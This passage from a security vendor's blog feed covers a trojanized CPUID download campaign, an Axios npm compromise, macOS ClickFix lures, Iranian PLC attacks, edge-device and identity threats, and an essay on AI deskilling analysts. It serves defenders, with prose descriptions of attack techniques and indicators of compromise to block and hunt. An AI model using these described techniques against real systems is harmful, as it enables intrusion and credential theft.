The final payload, STX RAT, delivered hidden VNC providing an attacker-controlled desktop session invisible to the user, keyboard and mouse injection, browser credential theft across Chrome, Firefox, Edge, and Brave, Windows Vault extraction, cryptocurrency wallet access, and a reverse proxy for follow-on payload delivery. C2 communication ran over a custom encrypted protocol using DNS-over-HTTPS to 1.1.1.1 to bypass DNS monitoring.

A reflective payload executing entirely in memory, inside a signed process, with no disk writes, compresses the detection window to milliseconds. Autonomous response is the only response fast enough.

The Attacker’s Critical Mistake

Kaspersky’s analysis linked the CPUID samples to a March 2026 campaign targeting FileZilla users within hours, and the connection required no advanced forensics. The attacker reused the identical C2 infrastructure and deployed the unmodified STX RAT payload, the same one eSentire’s Threat Response Unit had already fingerprinted and published YARA rules for after the FileZilla campaign.

Those rules detected the CPUID variant without modification.

The actor invested time compromising CPUID’s download API and did nothing to retool after being publicly fingerprinted. The C2 domain, the backend server, the payload: all identical across campaigns. The same backend server had been operating since at least July 2025. Per Kaspersky’s own assessment, the C2 reuse was the gravest mistake of the operation. A more disciplined actor burns infrastructure between campaigns. This one did not, and defenders had working detection before most victims knew an attack had occurred.

What the Attack Was Really For

The 150+ confirmed victims span retail, manufacturing, consulting, telecommunications, and agriculture. The count is almost certainly low, CPUID’s tools have tens of millions of users globally, and the portable ZIP variant of CPU-Z runs commonly on production systems in environments that block installer-based software.

Victim count is secondary to victim profile. CPU-Z users skew toward IT professionals: system administrators, developers, security engineers, the people with domain admin rights, production access, and infrastructure keys. One compromised sysadmin carries a fundamentally different blast radius than one compromised user.

The operational pattern points to an initial access broker. The goal was to sell persistent, hidden access. Someone else would do the extracting.

For organizations where an infection occurred, two questions need answers. What did the attacker do during the window they had access, especially if that machine belonged to a privileged user? And what happens over the next 60-90 days, when whoever purchased that access decides to activate it? Ransomware affiliates who buy IAB access typically move within that window. Cleaning the machine closes one exposure. Monitoring for lateral movement, credential reuse, and unusual authentication in the weeks following remediation closes the other.

What Defenders Should Do Now

For practitioners

The indicators are specific and actionable.

  • Check your fleet for CRYPTBASE.dll in any directory other than C:\Windows\System32.
  • Look for the process chain cpuz_x64.exe or any CPUID application spawning PowerShell.
  • Block supp0v3[.]com and 147.45.178.61 at DNS and firewall layers.
  • At the network layer, watch for DNS-over-HTTPS queries to 1.1.1.1/dns-query resolving welcome.supp0v3.com; STX RAT specifically uses DoH to bypass DNS monitoring, and any endpoint generating this pattern is a high-confidence indicator.

If you find an infected machine, remediate all four persistence mechanisms explicitly: the registry Run key, the scheduled task, any MSBuild .proj files in AppData\Local, and PowerShell profile autoruns. The malware installs redundant footholds specifically because partial cleanup leaves it alive.

For security leaders

The harder conversation is about supply chain trust. Your users followed every rule they were given. They downloaded from the official website. They trusted a vendor they had used for years. That vendor’s infrastructure failed them. Behavioral detection, security that watches what software does rather than where it came from, is the layer that caught this.

The business case is specific. When an initial access broker sells a foothold obtained this way, the buyer typically activates within 60-90 days. With average ransomware recovery costs exceeding $4 million per incident, even a single privileged endpoint sold through an IAB represents material, quantifiable exposure. The organizations that already had 24/7 autonomous behavioral monitoring in place closed the window before it opened. The ones that did not are still counting.

The adversary’s tooling was unsophisticated. The OPSEC was poor. The C2 reuse was a gift to defenders. And yet: 150+ confirmed victims and a 19-hour window during which clean, legitimate software was being replaced by a remote access trojan is a demonstration of how far attacker leverage has extended into the software supply chain, and how quickly behavioral detection closes the gap when it acts autonomously, before the attack completes its first stage. The attacker’s poor OPSEC saved defenders this time. The structural failure in the trust model (the assumption that software from a trusted source is safe to run) persists regardless of attacker discipline.

The Structural Problem That Remains

SentinelOne’s latest Annual Threat Report documents GhostAction and the NPM package compromise as supply chain identity attacks through code repositories and package managers. CPUID adds a third layer: the vendor’s distribution infrastructure itself. Across all three cases, access controls validated a legitimate identity. The report frames this plainly: “The identity is verified, but the intent has been subverted, rendering traditional access controls ineffective against the resulting supply chain contamination.”

This shift means authorization, the cornerstone of traditional software trust, is no longer a sufficient security boundary. When the distribution channel becomes the failure point, verification has to move from the point of origin to the point of execution.

In the CPUID case, users followed every rule. They downloaded from the official vendor website. That vendor’s download API was the failure point, compromised at the infrastructure level for 19 hours, with no visible indication.

SentinelOne’s Behavioral AI engine detects suspicious and malicious patterns in real time, watching what the software does regardless of where it came from.

SentinelOne customers were protected through autonomous behavioral detection at the point of execution. The structural failure in the trust model (the assumption that software from a trusted source is safe to run) is a gap that better user behavior cannot close. Behavioral detection at machine speed is what closes it.

To understand how the Singularity™ Platform identifies threats across your environment, including those arriving through trusted software channels, request a demo.

The Good, the Bad and the Ugly in Cybersecurity – Week 15

The Good | DoJ Disrupts TP-Link Router Network Run by Russian Spy Org

This week, authorities in the U.S. carried out Operation Masquerade, a court-authorized operation to disrupt a DNS hijacking network run by Russia’s GRU Unit 26165 (APT28). The network involved the compromise of thousands of TP-Link small home and small office routers, spread across more than 23 U.S. states.

Since at least 2024, APT28 operators have been exploiting known vulnerabilities in the devices to steal credentials, gain unauthorized access to router management interfaces, and silently rewrite DNS settings so that queries were redirected to GRU-controlled resolvers instead of the users’ normal providers. The actors then applied automated filtering on the hijacked traffic to pick out DNS requests of intelligence interest.

For selected targets, the resolvers returned forged DNS records for specific domains to insert GRU-controlled infrastructure into encrypted sessions. This allowed operators to collect passwords, authentication tokens, emails, and other sensitive data from devices on the same networks as the compromised routers, including users in government, military, and critical infrastructure sectors.

Russian espionage group APT28 compromised MikroTik and TP-Link routers to redirect traffic for certain authentication operations to AitM phishing kits

www.lumen.com/blog-and-new…

[image or embed]

— Catalin Cimpanu (@campuscodi.risky.biz) 7 April 2026 at 17:10

Under court supervision, the FBI developed and deployed a series of commands to send to compromised routers. The operation captured evidence of GRU activity and reset the DNS configuration so the devices would obtain legitimate resolvers from their ISPs. It also blocked the original path the actors used for unauthorized access.

According to DOJ, the FBI first tested the command set on the same TP-Link router models and firmware in a controlled environment, with the goal of leaving normal routing functions intact, avoiding access to any user content, and ensuring that owners could reverse the changes via a factory reset or web management interface.

The bureau is now working with U.S. internet service providers to notify customers whose routers fell within the scope of the warrant.

The Bad | Threat Actors Turn to Script Editor to Bypass Apple’s ClickFix Mitigation

SentinelOne researchers have discovered a variant of the ClickFix social engineering trick targeting macOS users that avoids the need for victims to unwittingly copy-paste commands to the Terminal. Apple recently updated the desktop operating system to include a mitigation for Terminal-driven ClickFix attacks, but threat actors have moved quickly to sidestep Apple’s response.

SentinelOne researchers discovered a campaign in which threat actors used a lure to install the popular AI-Assistant Claude to deliver AMOS malware. The lure leverages the appplescript:// URL scheme to launch the Script Editor from the user’s browser, with the editor pre-populated with malicious commands. The delivery mechanism offers threat actors a smooth, Terminal-free, attack flow that simply asks the user to perform a few clicks, with no copy-paste involved.

Instructions to victims from a malicious web page
Instructions to victims
Script Editor opens with pre-populated malicious commands
Script Editor opens with pre-populated malicious commands

Analysis of the payloads shows the technique is being used to deliver AMOS/Atomic Stealer malware that reaches out to hardcoded C2 infrastructure and attempts to exfiltrate browser data, crypto wallets and passsword stores in a single run. SentinelOne customers are protected against AMOS and similar variants of infostealer.

Researchers at JAMF later described a similar campaign using a webpage themed to look like an official Apple help page with instructions on how to reclaim disk space. Taken together, these campaigns suggest that Script Editor–driven ClickFix flows are becoming a reusable pattern rather than a one-off trick.

In the recent macOS Tahoe 26.4 update, Apple added a new security feature to warn users when pasting commands into the Terminal under certain conditions. Threat actors had moved towards the Terminal copy-paste method in response to Apple blocking a previous widely-used method of bypassing Gatekeeper via a Control-click override. However, the new Script Editor-based delivery mechanism entirely sidesteps these efforts and continues the long-running cat-and-mouse game between the operating system vendor and malware authors.

The Ugly | Iranian Hackers Target U.S. PLCs in Critical Infrastructure

Iran-affiliated APT actors are actively exploiting internet-facing operational technology (OT) devices, including Rockwell Automation/Allen-Bradley programmable logic controllers (PLCs), across multiple U.S. critical infrastructure sectors.

According to a joint advisory from CISA and other agencies, this activity has led to PLC disruptions, manipulation of data on HMI/SCADA displays, and in some cases operational disruption and financial loss. The authoring agencies assess that these Iranian-affiliated actors are conducting the campaign to cause disruptive effects inside the United States and note an escalation in activity since at least March 2026.

The campaign focuses on CompactLogix and Micro850 PLCs deployed in government services and facilities, water and wastewater systems, as well as the energy sector. Using leased third-party infrastructure together with configuration tools such as Rockwell’s Studio 5000 Logix Designer, the actors establish apparently legitimate connections to exposed PLCs over common OT ports including 44818, 2222, 102, and 502.

Once connected, they deploy Dropbear SSH on victim endpoints to gain remote access over port 22, extract project files such as .ACD ladder logic and configuration, and alter the process data operators see on HMI and SCADA dashboards. The same port-targeting pattern suggests the actors are also probing protocols used by other vendors, including Siemens S7 PLCs.

Iran-affiliated cyber actors are targeting operational technology devices across US critical infrastructure, including programmable logic controllers (PLCs). These attacks have led to diminished PLC functionality, manipulation of display data and, in some cases, operational… pic.twitter.com/odBD3lBi0l

— FBI Cyber Division (@FBICyberDiv) April 7, 2026

The advisory places this activity in the context of earlier IRGC-linked operations against U.S. industrial control systems. In late 2023, IRGC-affiliated CyberAv3ngers targeted Unitronics PLCs used across multiple water and wastewater facilities, compromising at least 75 devices. The latest wave extends that playbook to a broader set of PLC vendors and sectors, reinforcing that internet-exposed controllers with weak or missing hardening remain a priority target for disruptive state-linked operations.

Edge Decay: How a Failing Perimeter Is Fueling Modern Intrusions

In the first blog of this series, we explored the Identity Paradox and how attackers exploit valid credentials to operate undetected inside enterprise environments. However, identity compromise rarely happens in isolation.

To understand how these attacks begin, we need to look earlier in the intrusion lifecycle at the place many organizations still assume is secure: the edge.

For years, cybersecurity strategy has been built around defending the perimeter to protect the enterprise. Firewalls, VPNs, and secure gateways were designed as the outer boundary of the organization – hardened systems intended to control access and reduce risk. But that model is breaking down. What was once treated as a defensive layer is now a frequent target of modern attacks.

Rather than acting purely as protection, the perimeter increasingly introduces exposure. This shift reflects what can be described as edge decay, a gradual erosion of trust in boundary-based security as attackers focus on the infrastructure that defines it.

The Perimeter Is No Longer a Safe Boundary

The scale of this shift is hard to ignore. Zero-day vulnerabilities often target edge devices, including firewalls, VPN concentrators, and load balancers, all of which are not fringe systems. They are foundational components of enterprise connectivity, and the infrastructure that organizations built to protect themselves has become the infrastructure attackers exploit first.

Yet, unlike endpoints or servers, many edge devices still sit outside traditional endpoint visibility and control. Because these appliances typically cannot run EDR agents, defenders are often forced to rely on logs and external monitoring instead. However, logging can be inconsistent, patch cycles are often slow, and in many environments, these devices are treated as stable infrastructure rather than active risk. This combination creates a persistent visibility gap.

Attackers have recognized this gap and are exploiting it at scale. Rather than targeting hardened endpoints, adversaries are shifting their focus to unmanaged and legacy edge infrastructure and the systems that sit at the intersection of trust and exposure.

Weaponization at Machine Speed

One of the most significant accelerators of edge-focused attacks is the rise of automation and AI-assisted exploitation.

Threat actors are no longer relying on manual discovery. Instead, they use automated tooling to scan global IP space, identify exposed devices, and operationalize vulnerabilities within hours of disclosure. In some cases, exploitation begins within days or even hours of a vulnerability becoming public.

This compression of the attack timeline has important implications for defenders. Traditional patching cycles and risk prioritization models are no longer sufficient when adversaries can move faster than organizations can respond. As a result, edge compromise is increasingly observed as an early step in broader intrusion chains, often preceding identity-based attacks.

Edge Devices as Persistent Beachheads

Adversaries are increasingly prioritizing edge infrastructure because it represents a structural blind spot. Rather than targeting well-defended endpoints, they focus on unmanaged or legacy systems that fall outside standard visibility. Once compromised, these devices become more than just entry points, they provide a stable foothold for continued operations.

Once attackers gain access to a firewall or VPN appliance, that system effectively becomes an internal pivot point rather than a boundary control. From there, adversaries can monitor traffic, capture credentials, and pivot deeper into the network.

Investigations have repeatedly shown how compromised edge devices are used to:

  • Intercept authentication flows and harvest credentials
  • Deploy web shells on internal systems
  • Create unauthorized accounts for persistence
  • Pivot directly into sensitive infrastructure such as virtualization platforms

SentinelOne’s® Annual Threat Report observed a case where attackers leveraged compromised F5 BIG-IP devices to move from the internet-facing edge directly into internal VMware vSphere environments. In another, vulnerabilities in Check Point gateway devices were exploited to gain initial access across dozens of organizations globally.

These incidents reflect a broader pattern where the edge is becoming the attacker’s preferred entry point for lateral movement and identity compromise.

Living Inside the Infrastructure

More advanced campaigns take this concept even further by embedding themselves directly into the firmware of edge devices. The ongoing ArcaneDoor campaign, as noted in the Annual Threat Report, illustrates this evolution. Targeting legacy Cisco Adaptive Security Appliance (ASA) devices, attackers chained multiple zero-day vulnerabilities to deploy a firmware-level bootkit known as RayInitiator.

This implant is particularly dangerous because it operates below the operating system, allowing it to survive reboots and software updates. Alongside it, attackers deployed LINE VIPER, an in-memory payload capable of capturing authentication traffic and suppressing logging activity to evade detection. In effect, the device itself becomes both the attack platform and the concealment mechanism. When logging is suppressed and monitoring is absent, defenders lose visibility into the intrusion entirely.

The Rise of Untraceable Relay Networks

Compromised edge devices are not just used for internal access, they are also being repurposed as part of global attack infrastructure. State-sponsored actors have begun building Operational Relay Box (ORB) networks from compromised routers and firewalls. These networks allow attackers to route malicious traffic through legitimate but hijacked infrastructure, obscuring the true origin of their operations.

Clusters such as PurpleHaze and activity linked to groups like APT15 and Hafnium demonstrate how these relay networks are used to dynamically rotate attack paths, making attribution more difficult. As a result, malicious traffic can appear to originate from trusted enterprise systems, complicating both detection and response.

This dual use of edge devices as both entry points and relay infrastructure highlights a shift in how adversaries operationalize compromised systems.

Legacy Systems and the Illusion of Patchability

A major contributor to edge decay is the persistence of legacy systems. Many organizations continue to rely on outdated appliances that lack modern security features such as Secure Boot or robust integrity verification. These systems are often considered “patchable,” but in practice, they represent long-term operational risk that is difficult to fully mitigate.

Firmware updates can be disruptive and vendor support may be inconsistent. In many cases, organizations are hesitant to modify systems that underpin critical connectivity. The result is a growing population of edge devices that remain exposed long after vulnerabilities are discovered. In some environments, this problem is compounded by visibility gaps. Devices running unsupported operating systems or incompatible software cannot host modern security tooling, leaving them effectively unmonitored. These “legacy ghosts” become ideal targets for attackers for being stable, trusted, and largely invisible.

The Identity Connection

Edge compromise does not exist in isolation. It is deeply connected to identity-based attacks. Once an attacker controls a gateway or VPN appliance, they gain access to authentication flows, session data, and credential material. This allows them to pivot directly into identity infrastructure, bypassing traditional defenses.

In many intrusions, edge compromise becomes the first step toward identity abuse. This creates a direct connection between edge exposure and the challenges described in the Identity Paradox. Attackers do not need to break authentication if they can intercept it. By observing or capturing identity data in transit, they can operate using valid artifacts without triggering traditional controls.

Conclusion | Securing Edge Infrastructure from the Vanishing Perimeter

The perimeter isn’t failing, it’s already failed. Every unpatched VPN, every legacy firewall running decade-old firmware, every edge device outside your visibility is a door left open and forgot about. The question isn’t whether attackers will find it. It’s whether you’ll see them when they walk through. Once attackers establish a foothold at the edge, they move quickly to compromise identities, escalate privileges, and expand their reach across the environment. This progression from edge access to identity abuse to full-scale intrusion is becoming the dominant pattern in modern attacks.

In this context, defending the edge means both protecting infrastructure and disrupting the earliest stages of the attack lifecycle. Given how dynamic and often unmanaged edge environments have become, they can no longer be treated as a reliable line of defense on their own.

To defend against adversaries who specialize in exploiting these blind spots, the path forward requires a shift in perspective from device-level alerts to attack lifecycle visibility, and from assumed integrity to continuous validation.

SentinelOne's Annual Threat Report
A defender’s guide to the real-world tactics adversaries are using today to abuse identity, exploit infrastructure gaps, and weaponize automation.

Third-Party Trademark Disclaimer

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

The Good, the Bad and the Ugly in Cybersecurity – Week 14

The Good | SentinelOne AI EDR Stops LiteLLM Supply Chain Attack in Real Time

This week, SentinelOne demonstrated how autonomous, AI-driven endpoint protection can detect and stop sophisticated supply chain attacks in real time, without human intervention. On the same day the attack was launched, Singularity Platform identified and blocked a trojanized version of LiteLLM, an increasingly popular proxy for LLM API calls, before it could execute across multiple customer environments. The compromise had occurred only hours earlier, yet the platform prevented execution instantly, without requiring analyst input, signatures, or manual triage.

Catching the Payload in the Act

The attack itself followed a multi-stage, fast-moving, pattern that is designed to evade traditional detection and manual workflows. Originating from a compromised security tool, attackers obtained PyPi credentials to publish malicious LiteLLM versions that deployed a cross-platform payload. In one case, SentinelOne observed an AI coding assistant with unrestricted permissions unknowingly installing the infected package, highlighting a new and largely ungoverned attack surface.

Once triggered, the malware attempted to execute obfuscated Python code, deploy a data stealer, establish persistence, move laterally into Kubernetes clusters, and exfiltrate encrypted data. SentinelOne’s behavioral AI detected the malicious activity at runtime, specifically identifying suspicious execution patterns like base64-decoded payloads, and terminated the process chain in under 44 seconds while preserving full forensic visibility.

Critically, detection did not depend on knowing the compromised package. Instead, it relied on observing behavior across processes, allowing the platform to stop the attack regardless of how it entered the environment – whether via a developer, CI/CD pipeline, or autonomous agent.

This incident underscores a growing trend: AI-driven attacks are operating at speeds that outpace human response. Effective defense now requires autonomous, behavior-based systems capable of acting instantly, closing the gap between detection and compromise before damage can occur.

The Bad | Attackers Compromise Axios to Deliver Cross-Platform RAT via Compromised npm

For JavaScript HTTP client Axios, a major supply chain attack compromised its systems after malicious versions of an npm package introduced a hidden dependency that deploys a cross-platform remote access trojan (RAT). Specifically, Axios versions 1.14.1 and 0.30.4 were found to include a rogue package called “plain-crypto-js@4.2.1,” inserted using stolen npm credentials that belonged to a core maintainer. This allowed attackers to bypass normal CI/CD safeguards and publish poisoned releases directly to npm.

Source: Socket

The malicious dependency exists solely to execute a post-install script that downloads and runs platform-specific malware on macOS, Windows, and Linux systems. Once executed, the malware connects to a command and control (C2) server, retrieves a second-stage payload, and then deletes itself while restoring clean-looking package files to evade detection. Notably, no malicious code exists within Axios itself, making the attack harder to detect through traditional code review.

The operation was highly coordinated, with staged payloads prepared in advance and both affected Axios branches compromised within minutes. Each platform-specific variant – C++ for macOS, PowerShell for Windows, and Python for Linux – shares the same functionality, enabling system reconnaissance, command execution, and data exfiltration. While macOS and Linux variants lack persistence, the Windows version establishes ongoing access via registry modifications.

Researchers believe the attacker leveraged a long-lived npm access token to gain control of the maintainer account. There are also indications linking the malware to previously observed tooling associated with a North Korean threat group known as UNC1069.

Users are strongly advised to downgrade Axios immediately to versions 1.14.0 or 0.30.3, remove the malicious dependency, check for indicators of compromise, and rotate all credentials if exposure is suspected.

The Ugly | High-Severity Chrome Zero-Day in Dawn Component Allows Remote Code Execution

Google has issued security updates for its Chrome browser to address 21 vulnerabilities, including a high-severity zero-day flaw, tracked as CVE-2026-5281, that is actively being exploited in the wild. The vulnerability stems from a use-after-free (UAF) bug in Dawn, an open-source implementation of the WebGPU standard used by Chromium. If successfully exploited, it allows attackers who have already compromised the browser’s renderer process to execute arbitrary code via a specially crafted HTML page.

While Google has confirmed active exploitation, it has withheld technical details and attribution to limit further abuse until more users apply the patch. This zero-day is the latest in a series of actively-exploited Chrome flaws addressed in 2026 so far, bringing the total to four for this year alone. Previous issues included vulnerabilities in Chrome’s CSS component, Skia graphics library, and V8 JavaScript engine.

The Dawn flaw could lead to browser crashes, memory corruption, or other erratic behavior, underscoring the risks posed by modern browser attack surfaces. To date, Google has released fixes in Chrome version 146.0.7680.177/178 for Windows and macOS, and 146.0.7680.177 for Linux, now available through the Stable Desktop channel.

To protect against the flaw, Users can update Chrome immediately by navigating to the browser’s settings and relaunching after installation. Other Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, are also expected to roll out patches and should be updated promptly. CISA has added the flow to its KEV catalog and mandated that FCEB agencies apply the patch by April 15, 2026 to prevent their networks from attack. This latest incident highlights the ongoing targeting of web browsers by threat actors and reinforces the importance of timely patching to mitigate exploitation risks.

The Identity Paradox: The Hidden Risks in Your Valid Credentials

For decades, attackers have favored one intrusion method over all others: compromise the identity. Long before ransomware crews industrialized extortion and modern malware ecosystems matured, adversaries understood a simple truth. If you can access a legitimate account, you can bypass most security controls and operate inside a network with the same privileges as the user who owns it. That strategy has not changed. What has changed is the scale and complexity of the identity surface attackers can exploit.

Modern enterprises no longer operate around a single directory and a handful of user accounts. Instead, organizations rely on sprawling webs of identities that span SaaS platforms, cloud infrastructure, APIs, service accounts, and increasingly autonomous AI agents. A single employee account may now provide access to dozens of interconnected services, while non-human identities quietly power automation behind the scenes.

This evolution has created a fundamental security dilemma: organizations now collect more identity telemetry than ever before, yet identity-based intrusions remain some of the hardest attacks to detect. Security teams are facing what can only be described as the “Identity Paradox”.

More Identity Data, Less Clarity

The Identity Paradox reflects a growing imbalance in modern security operations. Enterprises have unprecedented visibility into authentication events, login attempts, and access logs, yet attackers continue to breach organizations using legitimate credentials. The reason is simple: an attacker using a valid identity does not look like an attacker. They look like an employee doing their job.

SentinelOne’s Steve Stone, Warwick Webb, and Matt Berry break down some of the key aspects of the “Identity Paradox”.

Under this guise, threat actors increasingly rely on techniques that inherit trusted sessions or legitimate credentials. These include stolen authentication tokens, adversary-in-the-middle (AiTM) phishing campaigns, compromised developer accounts, and even state-sponsored insiders. In each case, the attacker bypasses security by leveraging an identity that the system already trusts.

When authentication appears legitimate, traditional defenses struggle to distinguish between normal activity and malicious intent. The problem is further compounded by the wide spectrum of identity abuse methods now being observed in the wild.

When the Attacker Is an “Employee”

At one extreme of the identity threat landscape are traditional credential theft campaigns powered by phishing, infostealers, and session hijacking tools. At the other extreme are state-sponsored actors who continue to put significant effort into infiltrating organizations by applying for open roles directly.

In recent years, investigators have documented coordinated efforts by North Korean IT workers to obtain remote employment at Western technology firms. These individuals create elaborate fake personas using stolen identities and fabricated work histories to pass background checks.

In 2025 alone, SentinelLABS tracked over 1,000 job applications and roughly 360 fake personas linked to these operations. Once hired, these individuals operate as legitimate insiders with authorized access to corporate infrastructure. From a telemetry perspective, the account is valid. HR has approved the employee and login activity appears normal, yet the identity itself has been subverted.

This highlights the core challenge of identity defense: the system may validate who the user is, but it cannot easily validate their intent.

Supply Chains & Trusted Developers

The Identity Paradox also extends deeply into the software supply chain. Developers and maintainers of open-source packages often hold privileged access to repositories that are widely trusted by downstream users. When these accounts are compromised, attackers can inject malicious code into legitimate projects while appearing to operate as the original maintainer.

One example observed in late 2025 involved the “GhostAction” campaign, where attackers compromised a GitHub maintainer account and pushed malicious workflows designed to extract secrets from development pipelines. Similarly, a phishing attack against a maintainer of popular NPM packages led to the deployment of malicious code capable of intercepting cryptocurrency transactions.

In both cases, the malicious commits originated from accounts with legitimate write access. Access controls were functioning exactly as designed. While the identity was verified, the intent behind the activity had changed.

The Expanding Identity Surface

As the definition of identity expands, employees are no longer the only actors operating within enterprise environments. Service accounts, APIs, workload identities, and AI agents are now executing actions across cloud platforms and SaaS environments at machine speed.

These non-human identities (NHIs) often operate with persistent privileges and broad access to critical resources. However, they are frequently overlooked in traditional identity governance frameworks. As organizations adopt automation and agent-driven workflows, non-human identities are rapidly becoming one of the fastest-growing attack surfaces in cybersecurity.

Traditional identity security models were built around human users and authentication events. That model does not translate well to NHIs, which can be ephemeral, programmatic, and massively scaled. In many environments, these automated identities vastly outnumber human users.

The Authorization Gap

The shift toward automation exposes another structural weakness in traditional identity security: the “Authorization Gap”. Security frameworks have historically focused on the moment of authentication as a gate that determines whether a user is allowed to enter. To follow this, organizations have in turn invested heavily in stronger authentication mechanisms, granular permissions, and zero trust access models. These controls remain essential, but authentication alone cannot determine what happens after access is granted.

A fully authenticated user may still perform reconnaissance, exfiltrate sensitive data through a browser, or upload proprietary code into generative AI tools. Likewise, a correctly provisioned service account could be abused for lateral movement across cloud infrastructure. Once inside, traditional identity systems often assume legitimacy. This assumption creates a dangerous blind spot between who is allowed into the system and what they actually do once inside it.

Shifting the Focus to Behavior

Defeating the Identity Paradox requires a fundamental shift in how organizations think about identity security. Moving away from a narrow focus on authentication, defenders can broaden the scope by monitoring the behavior that occurs after login. Post-authentication behavioral monitoring allows security teams to identify deviations from expected activity patterns such as:

  • Access to sensitive repositories outside a developer’s normal workflow
  • Unexpected privilege changes or administrative actions
  • Bulk data exports from SaaS platforms
  • Identity-driven lateral movement across systems

These behavioral signals often reveal malicious activity long before traditional alerts trigger. Organizations should treat events such as new MFA device enrollments, OAuth permission grants, and service account privilege changes as high-risk signals that require close scrutiny. Restricting long-lived sessions, monitoring concurrent authentication activity, and auditing machine-to-machine trust relationships can significantly reduce an attacker’s ability to convert a single compromised credential into persistent access.

Conclusion | Defeating the Identity Paradox

Identity is both the attacker’s preferred entry point and the defender’s most valuable signal. Organizations that succeed in defending against identity-driven threats will be those that treat identity not as a static credential, but as a continuously monitored security boundary.

That means validating not only who is acting within the system, but also how that identity behaves over time, whether it belongs to a human employee, a service account, or an autonomous AI agent. As automation accelerates and machine-driven activity expands across enterprise environments, identity security must evolve accordingly.

SentinelOne’s® Autonomous Security Intelligence architecture is designed to support this expansion. It delivers comprehensive visibility and response across both human and non-human activity where Singularity Identity delivers essential context around who (or what) is taking action, Prompt Security detects misuse within browsers and AI-driven workflows, and Singularity Endpoint verifies behavior directly at the system level.

Together, all three capabilities create a continuous execution layer that correlates activity across identities, applications, and devices. SentinelOne uniquely provides immediate, end-to-end visibility into GenAI usage along with data protection at every point of employee interaction on managed devices – all without requiring SASE redesigns or API-level integrations.

As advanced threats increasingly operate behind legitimate access and automation drives more machine-led activity, enterprise resilience hinges on securing execution itself in real time. SentinelOne is evolving identity from a static checkpoint into an ongoing system of behavioral validation, ensuring the integrity of every action across the enterprise, whether performed by a user, service account, or AI agent.

SentinelOne's Annual Threat Report
A defender’s guide to the real-world tactics adversaries are using today to abuse identity, exploit infrastructure gaps, and weaponize automation.

Third-Party Trademark Disclaimer

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

The Implementation Blind Spot | Why Organizations Are Confusing Temporary Friction with Permanent Safety

Across organizations, AI adoption is accelerating. Tools are being deployed, workflows are being restructured, and headcount decisions are being made against the assumption that AI will absorb the analytical load. Most leaders doing this work believe they are being careful because the technology keeps reminding them it isn’t ready yet.

This is a dangerous phase in any technological transition. While we are currently struggling to get these models to behave, to integrate them into our stacks, and to verify their messy outputs, we feel safe. We mistake the current difficulty of implementation for the inherent difficulty of the task. This is not just an error in judgment. It is a cognitive trap that will cost organizations their institutional knowledge and competitive advantage.

This trap has a name. The “cognitive rust belt” is the hollowing-out of human analytic capacity when organizations hand core thinking tasks to AI and stop exercising those skills themselves. It is happening now, across industries, hidden behind a wall of implementation friction that makes the problem invisible to the people experiencing it.

If you lived through the early days of the internet or the migration to the cloud, you know this feeling. You remember the broken APIs, the architectural wars, the endless debates about whether it would ever really work at scale. But there is a fundamental difference this time that most leaders are missing because they are too busy fighting with their prompts.

The critical question is not how hard AI is to implement today. It is what your organization looks like once it isn’t. This piece names that difference, explains why the current friction is masking the problem rather than preventing it, and gives you three questions to audit your exposure before the window closes.

Infrastructure vs. Intellect | The Category Difference

The transitions to the internet and the cloud were shifts in infrastructure. They changed where data lived and how it moved. They were, fundamentally, plumbing problems. Whether you were mailing a floppy disk or uploading to an S3 bucket, a human still had to do the analytical work. The friction was in the delivery mechanism, not the cognition itself.

The AI transition is categorically different. This is a shift in agency, not architecture. We are not just changing the pipes; we are changing who (or what) processes the data. And this distinction matters more than many organizations realize.

Consider a typical analysis task in 2010 versus today. In 2010, the challenge was getting the right telemetry in front of the analyst and doing it fast enough. You pulled server logs, endpoint artifacts, maybe a PCAP or a disk image, then you manually triaged. You grepped, pivoted, correlated timestamps across sources, built a timeline, extracted IOCs, assessed scope and impact, and wrote the recommendation: contain, eradicate, harden, detect. Infrastructure limited speed and scale, but the human remained the cognitive bottleneck.

Today, the hard part is “getting the AI to behave”: stop hallucinating, follow the format, use the right context, ground in the right evidence. But that framing hides what’s actually changing.

We are not just accelerating access to data, we are delegating the synthesis. When a model reads a week of EDR events, clusters related activity, proposes likely intrusion paths, summarizes the timeline, and drafts containment steps, it is not acting as infrastructure. It is acting as the junior analyst. The human’s job shifts from doing the reasoning to auditing it.

The problem is that right now, the cognitive rust belt is hidden behind that wall of technical frustration. Your team appears engaged because they are working hard to make AI work. They are debugging prompts, building verification pipelines, implementing guardrails. This looks like skill development. It is not. They are sharpening their troubleshooting skills for a tool that will eventually be frictionless, not sharpening their domain expertise.

When the friction disappears, and it will, what muscle memory will they have built? The ability to craft better prompts for a model that no longer needs careful prompting. The ability to verify outputs from a system that has become more reliable than their own domain knowledge. The ability to troubleshoot integrations that have been standardized and commoditized.

Why Senior Staff Can’t See This Problem

Those of us currently in the workforce grew up in the grunt work era. We built mental models, smell tests, and professional intuition through years of manual, often tedious labor. We learned to spot a flawed analysis not because we ran it through a verification checklist, but because something felt wrong. That instinct came from doing it wrong ourselves, repeatedly, at 2am with a deadline looming.

We view AI through the lens of a senior professional. To us, it is an assistant that handles the boring stuff while we provide the oversight. We find it nearly impossible to imagine a world where that intuition does not exist because it is already baked into our brains. We cannot un-know what we know.

This creates a massive blind spot. When you automate the entry-level rungs of the ladder, you are not “freeing people up for higher-level work.” You are removing the very gym where the mental muscles for that higher-level work are built.

The pattern holds across any profession where expertise is built through repetitive, often tedious, hands-on work. Research[1,2] on expert performance consistently finds that professional judgment develops not through instruction, but through repeated engagement with real problems — making errors, receiving feedback, and slowly recalibrating.

Think about how a senior financial analyst develops their sense for when a valuation model is off. It is not from reading the textbook on discounted cash flow. It is from building hundreds of models, getting the assumptions wrong, seeing the absurd outputs, and slowly calibrating their instincts. They develop a sensitivity to which levers matter and which are noise.

Now imagine a junior analyst whose first three years are spent reviewing AI-generated models. They can spot when the AI has made an obvious error because the revenue growth assumption is 400%. But can they spot when the model has used the wrong cost of capital framework for an emerging market acquisition? Can they sense when the comparable set is technically correct but strategically misleading?

The answer is no. Not because they are less intelligent, but because they never developed the error-detection patterns that come from making and fixing their own errors. They are one layer removed from the problem space. They are auditors of a system they have never operated.

